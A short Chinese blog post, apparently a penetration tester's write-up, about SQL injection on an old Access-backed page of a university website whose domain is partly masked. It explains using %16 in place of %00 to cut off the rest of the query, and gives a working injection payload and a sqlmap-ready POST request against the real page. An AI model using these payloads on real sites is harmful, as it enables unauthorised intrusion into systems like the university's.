活久见-某高校古老站Access 数据库 SQL注入

Posted 2021-12-10 Ocean:)

在渗透测试中如果出现这样的报错

Microsoft JET Database Engine 错误 '80040e14'

说明存在access sql注入

因为access注入点不在最后，Access数据库没有注释符，所以暂时无法利用

但是有时候可以使用Null,也就是%00，来移除查询语句里面一些无用的部分。但是在有些情况便无法使用这种方式，例如php里面开启了magic_quote_gpc参数，那么便会在Null前面添加反斜杠，从而导致失去意义；为了避免这种可能存在的情况，我们可以使用%16，也就是SYN 字符，来实现相同的效果

比如此处，注入点闭合前半部分后，后半部分就可以使用 %16 滤掉后边的内容

selectTime=1')  and 1=1 %16

使用sqlmap post 使用 * 星号指定 位置 注入

POST /WebClassAll.asp HTTP/1.1
Host: www.****edu.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDCSARBSBS=********
Referer: http://www.********.edu.cn/WebClass.asp?ID=499
Accept-Encoding: gzip

selectTime=1') * %16

get确实存在sql注入